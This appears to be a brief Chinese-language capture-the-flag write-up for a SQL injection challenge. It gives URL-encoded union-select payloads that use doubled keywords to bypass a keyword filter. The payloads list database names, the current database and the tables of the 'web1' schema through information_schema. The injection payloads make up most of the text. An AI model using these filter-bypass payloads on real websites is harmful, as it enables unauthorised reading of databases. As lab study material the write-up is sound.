简单的sql注入1
检查注入点特征,发现对某些关键字有过滤
爆出所有的数据库名
双写绕过
方法1
http://ctf5.shiyanbar.com/423/web/?id=%27%20unionunion%20%20selectselect%20%20schema_name%20%20fromfrom%20%20information_schema.schemata%20wherewhere%20%20%271%27=%271
方法2
http://ctf5.shiyanbar.com/423/web/?id=1%27%20unionunion%20%20selectselect%20%20database()%27
爆出web1库下所有表名
http://ctf5.shiyanbar.com/423/web/?id=%27%20unionunion%20%20selectselect%20%20table_name%20%20fromfrom%20%20information_schema.columninformation_schema.columnss%20%20wherewhere%20%20table_schemtable_schemaa=%27web1%27%20andand%20%20%271%27=%271
(question:why not information_schema.tables?)